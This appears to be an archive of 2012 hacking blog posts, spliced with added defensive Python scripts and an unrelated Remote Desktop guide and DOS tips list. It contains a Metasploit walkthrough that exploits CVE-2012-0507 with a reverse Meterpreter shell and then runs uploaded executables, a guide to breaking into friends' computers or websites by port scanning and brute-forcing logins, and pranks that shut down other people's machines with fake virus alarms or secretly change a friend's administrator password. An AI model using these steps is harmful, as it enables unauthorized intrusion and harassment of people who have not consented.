
Monday, 8 October 2012

How To Remote Computer Using Metasploit

Whenever someone says "PenTesting tool", the first thing that comes to mind is Metasploit. Today, I am going to demonstrate how to use Metasploit to exploit the popular Java AtomicReferenceArray type violation vulnerability (CVE-2012-0507).

    About Metasploit:
    Metasploit is a very powerful PenTesting tool. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. It is a very useful tool for information gathering, vulnerability scanning, exploit development, client-side exploits, and more.

Mastering the Framework: A free course from Offensive-Security
The Offensive Security team, along with several active community members, made a free course on the Metasploit Framework, "Mastering the Framework". The course covers information gathering, social engineering attacks, exploit development, advanced AV avoidance, and more.

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

    Donate to HFC, Feed a Child!
    The "Mastering the Framework" course is free. If you enjoyed the course, please donate to Hackers for Charity (HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is sent directly to Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

    You can find further details about the donation here:
    http://www.offensive-security.com/metasploit-unleashed/Donate


Hey, where are you going?! Wait a sec, take that course once I have demonstrated how to use Metasploit, because it will be hard to understand, or boring, if you read those things directly.

Requirements:

    VirtualBox
    Target OS (Windows, ...)
    PenTesting distro (Backtrack)
    JRE 6 (unpatched version)


CVE-2012-0507 is a vulnerability in the JRE: the AtomicReferenceArray class implementation did not properly check whether the array is of the expected Object[] type. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or to bypass Java sandbox restrictions.

    Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, the Flashback malware infected more than 600,000 Mac computers by exploiting this vulnerability. Recently, the INSS and Amnesty International UK websites were injected with malicious code that exploits CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox. I have set up two virtual machines, named "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in "BT5".

(Need help configuring the VMs? Read this: setup PenTesting Lab.)

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and type "msfupdate". This will update the Metasploit Framework (MSF) with the latest exploits and payloads. As CVE-2012-0507 is a recent vulnerability, you have to update the MSF before proceeding further.

    Slow Internet connection?! If you have a slow Internet connection, you can download the java_atomicreferencearray module alone instead of updating all modules.
    Download java_atomicreferencearray.rb and paste it in this folder: "/opt/metasploit/msf3/modules/exploits/multi/browser/"

    Then download CVE-2012-0507.jar and paste it in this folder: "/opt/metasploit/msf3/data/exploits/"


Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:


Step 1:
Open the Terminal and type "msfconsole". This will bring up the Metasploit console, where you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray". This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display which settings are available and/or required for this specific module.



Now type "set SRVPORT 80"
and "set URIPATH /".



Step 3: Set Payload
Type "show payloads"; this will display the list of payloads. We are going to use the 'reverse_tcp' payload. This payload will get a reverse TCP connection from the Target to the PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address]: In order to get the reverse connection, we have to set our IP in LHOST.

Open the Terminal and type "ifconfig". This will display the IP info of our PenTesting machine. The IP will be "192.168.56.x". For instance, let me say the IP is 192.168.56.10.

Now type in the msfconsole: "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So, are you ready?! Let us break into the Target machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler on our machine and wait for anyone who connects to our HTTP server (e.g. http://192.168.56.10). Once the victim connects to our server, it will send a JAR that exploits the CVE-2012-0507 vulnerability.

Step 2:

Open Firefox/IE in the Target machine.
Enter "http://192.168.56.10".
It loads nothing, but the exploit runs in the background.
Step 3:
Open the BT5 machine; it will display the following output:


Now type "sessions"; this will show the list of active sessions.

Type "sessions -i 1"; this will open the connection to the session with id '1' and bring you to Meterpreter. Meterpreter will help you interact with and control the Target.



Step 4: Upload files
Yeeeh..! We got a backdoor to the Target machine; now we can run any commands in the Target.



For example, typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\': this command will upload Test.exe from the root ('file system') folder of BT5 to the C drive of the Target.

'execute -f C:\\Test.exe': this command will run our uploaded file in the Target.


Security Tips:
Update your JRE to the latest version.
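That tip boils down to one check on every host: is the installed JRE older than the update that fixes this bug? The script below is an added example, not code from the original post or from Metasploit. It parses the banner that `java -version` prints (for example `java version "1.6.0_29"`) into a (major, update) pair and compares it with a per-major-version baseline that the operator fills in from the vendor advisory; the threshold numbers in the block are placeholders, and the function names are mine.

```python
"""Check whether a JRE is older than a defender-supplied baseline.

Added example; not part of the original post or of Metasploit.  It parses the
banner that `java -version` prints (e.g. java version "1.6.0_29") into a
(major, update) pair and compares it with a per-major threshold supplied by
the operator from the vendor advisory.
"""
import re
import subprocess
from typing import Dict, Optional, Tuple

# Legacy Java version strings look like 1.<major>.<minor>_<update>, e.g. 1.6.0_29.
_LEGACY_RE = re.compile(r'version "1\.(\d+)\.\d+_(\d+)')


def parse_java_version(banner: str) -> Optional[Tuple[int, int]]:
    """Return (major, update) from a `java -version` banner, or None if unparseable."""
    m = _LEGACY_RE.search(banner)
    if m is None:
        return None
    return int(m.group(1)), int(m.group(2))


def is_below_baseline(banner: str, min_update: Dict[int, int]) -> Optional[bool]:
    """True if the JRE in `banner` is older than the baseline for its major version.

    `min_update` maps a major version (6, 7, ...) to the lowest update level the
    operator accepts as patched.  A major version absent from the map is treated
    as unsupported and therefore flagged.  None means the banner was unparseable.
    """
    parsed = parse_java_version(banner)
    if parsed is None:
        return None
    major, update = parsed
    if major not in min_update:
        return True
    return update < min_update[major]


def local_java_banner() -> Optional[str]:
    """Run `java -version` (it prints to stderr) and return its output, or None if no java."""
    try:
        proc = subprocess.run(["java", "-version"], capture_output=True, text=True)
    except FileNotFoundError:
        return None
    return proc.stderr or proc.stdout


if __name__ == "__main__":
    # PLACEHOLDER thresholds: replace with the update levels named in the vendor's
    # advisory for CVE-2012-0507.  The numbers below are constructed for the demo.
    baseline = {6: 999, 7: 999}
    banner = local_java_banner()
    if banner is None:
        print("java not found on PATH")
    else:
        verdict = is_below_baseline(banner, baseline)
        first = banner.splitlines()[0] if banner else ""
        print(first, "->", "unparseable" if verdict is None
              else ("BELOW baseline" if verdict else "ok"))
```

Run it on each host (or feed it banners collected by your inventory tool); an unparseable banner is reported as such rather than silently passing, because a runtime you cannot classify is not one you can call patched.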


Conclusion:
I hope this article has given you a good insight into how to use the Metasploit Framework to exploit the Java vulnerability. I hope this will help you get into the PenTesting world..!

Saturday, 6 October 2012

How To Remote Computer Using IP address


Literally, hacking is accessing something or somebody on the Internet without their permission or interest. Speaking in summary, hacking is a very easy job; it is like, instead of using the front door, finding the hidden door of a house and hijacking the precious things. Among all kinds of hacking, hacking via IP address is one of the most common yet powerful beginnings.

You may want to hack a website and put your advertisement there or grab some database information. In this type of hacking, you are playing with the web server's computer instead of the administrator's computer, because www.website.com is hosted on a separate web server rather than on a personal computer.

Another can be accessing your friend's computer from your home. Again this is IP based, and it is possible only when your friend's computer is online. If it is off or not connected to the Internet, then remote IP hacking is totally impossible.

Well, both kinds of hacking have the same process. Let's summarize what we must do.

    Confirm the website or computer you want to hack.
    Find or trace its IP address.
    Make sure that the IP address is online.
    Scan for open ports.
    Check for vulnerable ports.
    Access through the port.
    Brute-force the username and password.

Now let me describe it briefly, in basic steps that a child can understand.
First, getting the IP address of the victim.
To get the IP address of the victim website, ping it in the command prompt.

For example,
ping www.google.com

will fetch the IP address of Google.com.


This is how we can get the IP address of the victim's website.

How about your friend's PC? You can't do www.yourfriend'sname.com, can you? Finding your friend's IP address is a little tough job, and tougher if he has a dynamic IP address that keeps changing.

One of the widely used methods to detect the IP address of your friend is by chatting with him.

You might find this article helpful

    How to get the IP address using MSN/Yahoo/Pidgin messenger

Now you got the IP address right? Is it online?

To know the online status just ping the IP address, if it is online it will reply.

If the IP address is online, scan for the open ports. Open ports are like closed doors without locks; you can go inside and outside easily.

Use Advanced Port Scanner to scan all open and vulnerable ports.

Now you have the IP address and open port address of the victim; you can now use telnet to try to access them. Make sure that you have telnet enabled on your computer, or install it from Control Panel > Add/Remove Programs > Add Windows Components.

Now open the command prompt and use the telnet command to access the IP address. Use the following syntax for the connection.

telnet [IP address] [Port]

You’ll be asked to input login information.

If you can guess the information easily, then it's OK. Or you can use some brute-forcing tools like this one.

In this way you'll be able to hack a remote computer using only an IP address.
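The last steps of the procedure above (connect to the port, then guess credentials) leave a very recognisable trace in the target's own login log, which is where a defender catches them. The script below is an added example, not part of the original post: it runs a sliding-window failed-login count over constructed syslog-like lines and raises a second, more serious alert when a source succeeds while still above the threshold. The line format, hostname, process names and addresses (203.0.113.7, 198.51.100.20) are all made up for the demo; adapt LINE_RE to the real log format of the service you monitor.

```python
"""Flag password guessing against a login service from its log lines.

Added example, not part of the original post.  The log lines are constructed
in a syslog-like shape for illustration; adapt LINE_RE to the real format of
the service you monitor (telnet/login, sshd, RDP, ...).
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional, Tuple

# Constructed sample: one source guesses five passwords in a few seconds and
# then logs in; another fails twice, half an hour apart (ordinary typos).
SAMPLE_LOG = """\
2012-10-06T10:00:01 bastion login[4021]: FAILED LOGIN from 203.0.113.7 for 'admin'
2012-10-06T10:00:03 bastion login[4021]: FAILED LOGIN from 203.0.113.7 for 'admin'
2012-10-06T10:00:04 bastion login[4021]: FAILED LOGIN from 203.0.113.7 for 'root'
2012-10-06T10:00:06 bastion login[4021]: FAILED LOGIN from 203.0.113.7 for 'guest'
2012-10-06T10:00:07 bastion login[4021]: FAILED LOGIN from 203.0.113.7 for 'admin'
2012-10-06T10:00:09 bastion login[4021]: LOGIN SUCCESS from 203.0.113.7 for 'admin'
2012-10-06T10:05:00 bastion login[4188]: FAILED LOGIN from 198.51.100.20 for 'alice'
2012-10-06T10:30:00 bastion login[4302]: FAILED LOGIN from 198.51.100.20 for 'alice'
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ \S+: (?P<event>FAILED LOGIN|LOGIN SUCCESS) "
    r"from (?P<src>\S+) for '(?P<user>[^']+)'"
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return {
        "ts": datetime.fromisoformat(m.group("ts")),
        "event": m.group("event"),
        "src": m.group("src"),
        "user": m.group("user"),
    }


def detect_bruteforce(log_text: str, threshold: int = 5,
                      window_seconds: int = 60) -> List[Tuple[str, str, int]]:
    """Return (alert_kind, source_ip, failure_count) tuples.

    'bruteforce' fires once when a source reaches `threshold` failures inside a
    sliding window of `window_seconds`; 'success_after_failures' fires when a
    source logs in while still above the threshold, which is the case to treat
    as a possible compromise rather than noise.
    """
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    flagged: set = set()
    alerts: List[Tuple[str, str, int]] = []

    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        ts, src = ev["ts"], ev["src"]
        recent = failures[src]
        # Slide the window: forget failures older than window_seconds.
        while recent and (ts - recent[0]).total_seconds() > window_seconds:
            recent.popleft()
        if not recent:
            flagged.discard(src)  # the burst has expired; allow a fresh alert later

        if ev["event"] == "FAILED LOGIN":
            recent.append(ts)
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, len(recent)))
        else:
            if len(recent) >= threshold:
                alerts.append(("success_after_failures", src, len(recent)))
            recent.clear()
            flagged.discard(src)
    return alerts


if __name__ == "__main__":
    for kind, src, count in detect_bruteforce(SAMPLE_LOG):
        print(f"{kind}: {src} ({count} failures in window)")
```

The window keeps the two slow failures from 198.51.100.20 from ever alerting, while the burst from 203.0.113.7 produces one "bruteforce" alert and then a "success_after_failures" alert on the login that follows it; that second alert is the one to page on.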

Related news:

    Changing your IP Address
    Search the profile/people using their Email Address
    Get the larger image from Gravatar image icon
    How to get the IP address using MSN/Yahoo/Pidgin messenger
    Hacking and crashing website using IP

Remote Desktop in Mac OS

Using Remote Desktop, you can access a computer from a remote location. To connect to a Windows computer from another Windows computer, see In Windows, how do I use Remote Desktop to access my remote computer? To connect to a Windows computer from a remote computer running Mac OS X, see below.

To enable Remote Desktop, you must have administrative rights on the computer you want to use as the host (i.e., the computer to which you will connect from a remote location), which must be running one of the following versions of Windows:

    Windows 7 Professional, Enterprise, or Ultimate
    Windows Vista Business, Enterprise, or Ultimate
    Windows XP Professional

Before making a remote connection, first enable the Remote Desktop feature on your host computer, and then install Remote Desktop Connection client software on your client computer.
Enabling Remote Desktop

To enable the Remote Desktop feature on your host (Windows) computer:

    From the Start menu, select Control Panel (or Settings, and then Control Panel). Double-click System.

    In Windows 7 and Vista, click Remote settings. In the "Remote Desktop" section, select one of the two options to allow connections from other computers.

    In Windows XP, select the Remote tab. Select Allow users to connect remotely to this computer.
    To choose which users will have remote access, in 7 and Vista, click Select Users... , or in XP, click Select Remote Users... . Typically, all administrators of the computer will have access by default. Each user must have a password before you can allow remote access.

    When you are finished, click OK. Your computer will now be able to accept incoming Remote Desktop connections.

Installing Remote Desktop Connection client software

You can download the Remote Desktop Connection (RDC) client for Mac OS X from Microsoft Mactopia.
Opening a connection

    Depending upon your network configuration and system requirements, you may first have to establish a VPN connection to your host computer's network.

    At Indiana University:
        You must first establish a VPN connection if:

            You are off campus, connecting to a computer on campus.
            You are on campus, connecting to your home computer in campus or Greek housing.

        See The basics of VPN at IU.
        Alternatively, from your web browser, you can use the Remote Desktop application in IUanyWare, located in the "Utilities" section.

        See How do I set up and use IUanyWare?

    For more about remote desktop connections on the IU network, see About the block on off-campus remote desktop connections at IU.
    Launch Remote Desktop Connection.

    In the Remote Desktop Connection window, in the "Computer:" field, type the DNS name or IP address of the destination host.

    Click Connect.

    In the window that appears, enter your username, passphrase, and domain.

    Click OK to start your session. When you log out of your Windows session, the RDC application will close.

Thursday, 4 October 2012

How to Shutdown Another Computer in LAN Area

1. Go to Notepad.
2. Type in  command.com and save as cmd.bat.  A lot of schools block CMD on computers, and this is how to override that.
3. Open it up and it should go to CMD.
4. Type in 'shutdown -i' and press 'Enter'.
5. You will come to this white box with options....wow, that was a vague description.  You'll know it when you see it.  What you do now is add the name of the computer that you want to shut down, if necessary.
6. You can choose whether to warn users or not that their computer is about to shut down.  Personally, I prefer to warn users and as the comment, I like to put something like "WARNING, SECURITY BREACH IN SYSTEM" or "WARNING, VIRUS DETECTED. HARD DRIVE BEING WIPED".
7. Press OK and then shut down your computer as quickly as possible to avoid people knowing it was you.
8. Watch people freak out when their computer shuts down unexpectedly.

This is a really fun trick and I have done this to my brother at home while he was playing minecraft.  He was REALLY angry when he found out it was me.

Hack by Changing administrator Password

Okay, today, let's have some fun with Google. Also, today, I will show you how to hack anyone's computer by changing their administrator password. It's all completely reversible, so it is a trick AND a hack today.
Let's begin by having some fun with Google. How about we start with a very minor trick that you probably all know. If you do not have Google, then skip over to the hack.

1.  Open up Google.
2. Type : google l33t   into google search bar and press I'm Feeling Lucky.
Type : google loco   into google search bar and press I'm Feeling Lucky.
Type : google gothic into google search bar and press I'm Feeling Lucky.
Type : ewmew fudd    into google search bar and press I'm Feeling Lucky.
Type : xx-klingon    into google search bar and press I'm Feeling Lucky.
Type : xx-piglatin   into google search bar and press I'm Feeling Lucky.
Type : google bsd    into google search bar and press I'm Feeling Lucky.
Type : google linux  into google search bar and press I'm Feeling Lucky.
Type : answer to life, the universe, and everything  into google and press search.
Wasn't that fun?  Okay, let's do some graffiti with Google now.
3. Open up Google again.
4. Open up www.netdisaster.com and type in your target website.
5. Have some fun.

Okay, let's do the hack.  Do you have a buddy that you secretly hate? Come on.  We all do.  So, next time you're over at their house, go to their computer while they're in the washroom or cooking or playing a sport.
Just as a tip, if your friends know that you hack as a hobby, don't do this, because they will suspect you're at fault in a second.
Let's get started.

1. Open up notepad and type in command.com
2. Save it as 'cmd.bat'
3. Open it up.  You should come to a black screen.
4. Type in net user.
5. Then find the name of the administrator.
6. Once you have the name, type in 'net user [administrator name]*'
7. Type in the password that you choose.

Yes, your buddy may be pissed off, but it is completely reversible! Do the same process and just type in the password that your buddy chooses.

Various MS DOS


Contents:

- TRUENAME
- FDISK /STATUS
- FDISK /MBR
- SHELL=C:\COMMAND.COM /P /F
- COMMAND /F
- COMMAND /P
- COMMAND /D
- VER /R
- ECHO OFF and ECHO ON
- FORMAT /AUTOTEST
- FORMAT /BACKUP
- FORMAT /SELECT
- FORMAT /SELECT /U
- FORMAT /H
- IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
- Using ATTRIB to hide directories
- SWITCHES=/W
- FOR %%V IN (/SOMETHING)
- DIR,
- COPY. A:
- DOS?=HIGH
- INSTALLHIGH
- Using : for batch file comments
- REM in lines with pipes or redirection
- Delimiter character

===========================================================================
 TRUENAME
 --------

Internal DOS 5.0 command.  Canonicalizes a filename or path (using DOS interrupt 21h, function 60) and prints the actual directory.

     Syntax:

     TRUENAME filename   - Prints the complete path to file.
     TRUENAME directory  - Prints the complete path to directory.

Note:  If the path is in a network, it starts with a \\machine-name.

TRUENAME is analogous to the UNIX "whence" command.  It returns the real fully-qualified path name for a command.

TRUENAME is useful in networks, where a physical drive may be mapped to a logical volume, and the user needs to know the physical location of the file.  It ignores the DOS SUBST and JOIN commands, or network MAPped drives.

TRUENAME is an undocumented MS-DOS feature, but it is documented in JP Software's 4DOS software (COMMAND.COM replacement) as follows:

     Syntax:

     TRUENAME [d:][path]filename

     Purpose:

     Returns a fully qualified filename.

     Comments:

     TRUENAME will see "through" JOIN and SUBST commands, and
     requires MS-DOS 3.0 or above.

     Example:

     The following command uses TRUENAME to get the true pathname
     for a file:

     c:\>subst d: c:\util\test
     c:\>truename d:\test.exe

     c:\util\test\test.exe

TRUENAME will reveal the full drive and path of the filename.  If you specify a wildcard (*) in the filename, it will expand the filename to use question marks instead.  If the path includes the ..\ sequence, TRUENAME will examine the directory structure and calculate the path.

Stranger still, the line:

     TRUENAME \CRONK\FLIBBET\..\ART

...produces the response:

     C:\CRONK\ART

...even if the directories \CRONK\FLIBBET and the file ART don't exist!  Don't expect this command to work well across networks.  After all, this is still undocumented in MS-DOS for a reason!

===========================================================================
 FDISK /STATUS
 -------------

Prints a screen just like using option 4 of FDISK, "Partition information", but includes extended partition information.  Nice if you want to get an overview without fear of pressing the wrong keys.

Doesn't work in DOS 3.30.

===========================================================================
 FDISK /MBR
 ----------

MS-DOS 5.0 FDISK has an undocumented parameter, /MBR, that causes it to write the master boot record to the hard disk without altering the partition table information.  While this feature is not documented, it can be told to customers on a need-to-know basis.

Warning:  Writing the master boot record to the hard disk in this manner can make certain hard disks partitioned with SpeedStor unusable.  It can also cause problems for some dual-boot programs, or for disks with more than 4 partitions.  Specific information is below.

What is the MBR?

At the end of the ROM BIOS bootstrap routine, the BIOS will read and execute the first physical sector of the first floppy or hard drive on the system. This first sector of the hard disk is called the master boot record, or sometimes the partition table or master boot block. At the beginning of this sector of the hard disk is a small program. At the end of this sector is where the partition information, or partition table, is stored. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it.

This program is what is written to the disk by FDISK /MBR and is usually called the master boot record.  During normal operation, FDISK only writes this program to the disk if there is no master boot record.

Why is the MBR changed during Setup?

During installation of Microsoft MS-DOS 5 Upgrade, Setup will replace the master boot record on the hard disk with code to display the message:

        The MS-DOS 5.0 Setup was not completed.
        Insert the UNINSTALL #1 diskette in drive A.
        Press the ENTER key to continue.

This message should be erased and the master boot code rewritten before Setup is completed. If a problem occurs during Setup and you return to the previous MS-DOS, UNINSTAL should also remove this message. However, should Setup or UNINSTAL fail to remove this message, or should the master boot record become corrupted, a new master boot record can be written to the disk using the following command:

         C:\>fdisk /mbr

     WARNINGS:

     This option should not be used if:

        - the disk was partitioned using Storage Dimensions'
          SpeedStor utility with its /Bootall option
        - more than 4 partitions exist
        - certain dual-boot programs are in use

Storage Dimensions' SpeedStor utility using the /Bootall option redefines the drive's physical parameters (cylinder, head, sector).  /BOOTALL stores information on how the drive has been changed in an area of the master boot record that MS-DOS does not use. FDISK /MBR will erase that information, making the disk unusable.

Some older OEM versions of MS-DOS and some third-party partitioning utilities can create more than 4 partitions.  The additional partition information is commonly stored in an area that FDISK /MBR will overwrite.

Some dual-boot programs have a special MBR that asks the user which operating system they want on bootup.  FDISK /MBR erases this program.  Dual-boot systems that boot whichever partition is marked Active are not affected by FDISK /MBR.

If you have a boot sector virus, just boot from a known "clean", write-protected floppy disk that has FDISK on it, and run FDISK /MBR.
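The layout described under "What is the MBR?" can be checked directly, and so can the warning about data that third-party tools keep in the code area. The script below is an added example, not from the original file or from MS-DOS: it builds a constructed 512-byte sector in memory using the standard IBM PC layout (boot code in bytes 0..0x1BD, four 16-byte partition entries at 0x1BE, signature 0x55 0xAA at 0x1FE), decodes the partition table, and models FDISK /MBR as "replace only the code area". The sample partitions and the VENDOR_STASH marker are constructed; the marker stands in for the kind of data the text says SpeedStor /BOOTALL stores in the part of the sector MS-DOS does not use.

```python
"""Parse a 512-byte master boot record and model what FDISK /MBR rewrites.

Added example, not part of the original file or of MS-DOS.  The MBR layout
used here is the standard one: boot code in bytes 0..0x1BD, four 16-byte
partition entries starting at 0x1BE, and the 0x55 0xAA signature at 0x1FE.
The sample sector is constructed in memory; nothing touches a real disk.
"""
import struct
from typing import Dict, List, Optional

SECTOR_SIZE = 512
TABLE_OFFSET = 0x1BE      # start of the four partition entries
ENTRY_SIZE = 16
SIG_OFFSET = 0x1FE        # boot signature 0x55 0xAA
# status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
ENTRY_FMT = "<B3xB3xII"


def parse_partition_table(mbr: bytes) -> List[dict]:
    """Decode the four partition entries; raise if the sector is malformed."""
    if len(mbr) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    if mbr[SIG_OFFSET:SIG_OFFSET + 2] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    entries = []
    for i in range(4):
        status, ptype, lba_start, sectors = struct.unpack_from(
            ENTRY_FMT, mbr, TABLE_OFFSET + i * ENTRY_SIZE)
        entries.append({"index": i, "bootable": status == 0x80, "type": ptype,
                        "lba_start": lba_start, "sectors": sectors})
    return entries


def bootable_index(entries: List[dict]) -> Optional[int]:
    """Index of the entry marked active (the one the MBR code boots), or None."""
    for e in entries:
        if e["bootable"]:
            return e["index"]
    return None


def make_entry(bootable: bool, ptype: int, lba_start: int, sectors: int) -> bytes:
    return struct.pack(ENTRY_FMT, 0x80 if bootable else 0x00, ptype, lba_start, sectors)


def build_mbr(code: bytes, table: bytes) -> bytes:
    """Assemble a sector from a code area (padded to 0x1BE) and a 64-byte table."""
    if len(code) > TABLE_OFFSET or len(table) != 4 * ENTRY_SIZE:
        raise ValueError("code too long or table not 64 bytes")
    return code.ljust(TABLE_OFFSET, b"\x00") + table + b"\x55\xaa"


def rewrite_boot_code(mbr: bytes, new_code: bytes) -> bytes:
    """Model of FDISK /MBR: replace only bytes 0..0x1BD, keep table and signature."""
    if len(new_code) > TABLE_OFFSET:
        raise ValueError("boot code must fit before the partition table")
    return new_code.ljust(TABLE_OFFSET, b"\x00") + mbr[TABLE_OFFSET:]


# Constructed sample sector: a stand-in boot stub, plus a marker at 0x1B0 that
# plays the role of data a third-party tool keeps in the part of the code area
# MS-DOS itself does not use (the SpeedStor /BOOTALL case in the text).
VENDOR_STASH = b"VENDOR-STASH"
SAMPLE_CODE = b"\xeb\x3c\x90".ljust(0x1B0, b"\x00") + VENDOR_STASH
SAMPLE_TABLE = (make_entry(True, 0x06, 63, 204737)        # primary DOS (FAT16), active
                + make_entry(False, 0x05, 204800, 409600)  # extended partition
                + make_entry(False, 0x00, 0, 0)
                + make_entry(False, 0x00, 0, 0))


def demo() -> Dict[str, bool]:
    """Rewriting the code area keeps the table but loses the vendor stash."""
    original = build_mbr(SAMPLE_CODE, SAMPLE_TABLE)
    rewritten = rewrite_boot_code(original, b"\xeb\x3c\x90" * 4)
    return {
        "table_preserved": parse_partition_table(original) == parse_partition_table(rewritten),
        "stash_survived": VENDOR_STASH in rewritten,
    }


if __name__ == "__main__":
    for e in parse_partition_table(build_mbr(SAMPLE_CODE, SAMPLE_TABLE)):
        print(e)
    print(demo())
```

Point the parser at a real sector dump (512 bytes read from the first sector of a disk image) and it will list the same four entries FDISK's "Partition information" screen shows; the demo() result is the whole argument of the warnings above in two booleans: the table survives, anything stashed in the code area does not.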

===========================================================================
 SHELL=C:\COMMAND.COM /P /F
 --------------------------

The /F in the CONFIG.SYS SHELL= statement forces a "Fail" response to all "Abort, Retry, Fail" prompts issued by the DOS critical error handler.

===========================================================================
 COMMAND /F
 ----------

Entered on the command line, COMMAND /F makes all those annoying "Abort, Retry, Ignore, Fail" disk error messages default to "Fail" from then on until rebooting.

===========================================================================
 COMMAND /P
 ----------

For DOS 3.30 (not checked with other versions):  Docs say that this doesn't allow you to exit back to the previous shell, but /P also forces AUTOEXEC.BAT to be run on secondary shells.

===========================================================================
 COMMAND /D
 ----------

When used with a primary shell, or secondary with /P, prevents execution of AUTOEXEC.BAT.

===========================================================================
 VER /R
 ------

Yields extended information about the DOS version:

     MS-DOS Version 5.00
     Revision A
     DOS is in HMA

Doesn't work with DOS 3.30.  VER /R is a documented feature of JP Software's 4DOS.

===========================================================================
 ECHO OFF and ECHO ON
 --------------------

Entering ECHO OFF from the command line erases the prompt and leaves just a cursor on the screen.  ECHO ON from the command line restores the prompt.  This works with all versions of DOS.

One of the most frequently asked questions is "How do I ECHO a blank line in a batch file?"  The most common answer is to use ECHO directly followed by a period:  ECHO. like so.  However, just about any "white space" character will work, as well as any "delimiter".  The following alternatives can be used:  ECHO.  ECHO"  ECHO,  ECHO:  ECHO;  ECHO[  ECHO]  etc.  Apparently it's just the way that the command handles the delimiter and has been available from way back!  Microsoft just began mentioning it in the documentation recently, though, and their examples use a period.

===========================================================================
 FORMAT /AUTOTEST
 ----------------

The autotest parameter will allow FORMAT to proceed, checking the existing format of the disk (unless the /U parameter with DOS 5 or 6 is also present), and proceeding with the format.

All this will take place with no delay and no waiting for user input.  It will also end without pausing.  It will not ask for a volume label or whether to format another diskette.

WARNING!  This procedure will also work on hard drives!  Be very cautious if you plan to use this feature!

===========================================================================
 FORMAT /BACKUP
 --------------

This works exactly like /AUTOTEST, but it does ask for a volume label.

===========================================================================
 FORMAT /SELECT
 --------------

This is like the DOS MIRROR command... For safety-fanatics only.

===========================================================================
 FORMAT /SELECT /U
 -----------------

Just makes a disk unreadable.  Guess it could be handy?

===========================================================================
 FORMAT /H
 ---------

In DOS 3.30 (not tested with other versions), FORMAT /H will cause the format to begin immediately after pressing Y in response to "Format another", rather than displaying "Place disk to be formatted in drive x: and press Enter" on a second and subsequent disks.

In DOS 5.0, FORMAT reports "invalid switch".

===========================================================================
 IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
 ----------------------------------------------------------------

This is a handy quirk of DOS.  Installable drivers are seen as files in all directories.  You can use the if exist test to either test for the existence of a directory, with "if exist <dirname>\nul", which fails if the directory does not exist because the nul device is not found; or to test whether any driver is loaded, such as the DOS 5 or 6 EMM386 memory manager.

Caveats:  For testing NUL, you need to know the name of the directory or the driver whose existence you are testing, and this is MS-DOS specific -- it doesn't work on network drives, and may not work under DR-DOS.

Where did you learn the "EMMXXXX0" name from?  Instead of typing MEM /C, type MEM /D for the "debug" listing.

The only trouble is that IF EXIST returns true for COM3/4 and LPT2/3 even if the hardware does not exist.

===========================================================================
 Using ATTRIB to hide directories
 --------------------------------

The DOS 5.0 and 6.0 ATTRIB command can do the same thing for directories as it can for files:  ATTRIB +H <dirname>  will hide the named directory.

===========================================================================
 SWITCHES=/W
 -----------

Enables you to have the Windows 3.0 WINA20.386 file anywhere on your boot drive.  Without this you have to have it in the root directory.

This should not be used with Windows 3.1, since it appears to waste around 120K of UMBs.

===========================================================================
 FOR %%V IN (/SOMETHING)
 -----------------------

How can a batch file (without 4DOS) determine from which drive it has been started?

      Example:  C:\>a:test.bat

Now my batch should be able to find out that it is located on drive A: (not the path, only the drive!).

In a batch file, the variable %0 contains the name of the batch file as it was typed at the command line.  If you run the batch file as A:TEST.BAT, %0 will be "A:TEST.BAT".  If you have the directory on your path, and simply type TEST, then %0 will be "TEST".  The drive, path, and extension will only appear in %0 if you enter them in the command used to call the batch file (either typed at the command line, or called from another batch file).  So, you must specify the drive as part of the batch filename for this to work.

To extract the drive only from %0, use the undocumented FOR %%V in /SOMETHING command:

     set drive=
     for %%v in (/%0) do call test2 %%v
     echo Calling drive is %drive%

...where TEST2.BAT is:

     if '%drive%'=='' set drive=%1:

FOR %%V IN (/SOMETHING) DO WHATEVER will do WHATEVER twice -- the first time with %%V set to the first character in SOMETHING ("S"), the second time with all the remaining characters in SOMETHING ("OMETHING").  If SOMETHING is only a single character, WHATEVER will only be called once, with that character in %%V.  If the single character is a wildcard (? or *) that wild card will not be expanded to a set of filenames.  (The main purpose of this feature is apparently to allow inclusion of the literal characters "?" and "*" without them being expanded.)

This works in DOS 3.30 and later.

===========================================================================
 DIR,
 ----

Using a comma immediately after DIR shows ALL files, including the HIDDEN ones.

This appears only to work with DOS 5.0 and 6.0.  With 3.30, it doesn't display either IO.SYS, MSDOS.SYS (both with S, H and R attribs) or a test file with A and H attribs.

